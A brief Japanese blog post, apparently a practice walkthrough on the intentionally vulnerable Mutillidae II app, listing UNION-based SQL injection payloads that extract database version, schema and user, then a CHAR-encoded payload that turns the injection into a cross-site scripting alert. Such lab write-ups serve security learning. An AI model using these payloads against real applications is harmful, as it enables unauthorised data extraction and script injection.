Hello there, ('ω')ノ
久しぶりのMutillidae Ⅱを。
こちらにはSQLインジェクションの脆弱性があって。
UNIONを使って、カラム数と表示されるカラムを特定して。
' union select null,1,2,3,null,null,null --
' union select null,@@version,schema(),system_user(),null,null,null --
次に数字を文字に変えてみるとエラーとなるため。
' union select null,A,null,null,null,null,null --
下記のような関数を使用すると。
' union select null,char(65),null,null,null,null,null --
下記のサイトで、ペイロードの文字列をASCIIに変換して。
http://web-apps.nbookmark.com/ascii-converter/
下記を実行するとXSSが機能して。
' union select null,CHAR(60,115,99,114,105,112,116,62,97,108,101,114,116,40,39,88,83,83,39,41,60,47,115,99,114,105,112,116,62),null,null,null,null,null --
Best regards, (^^ゞ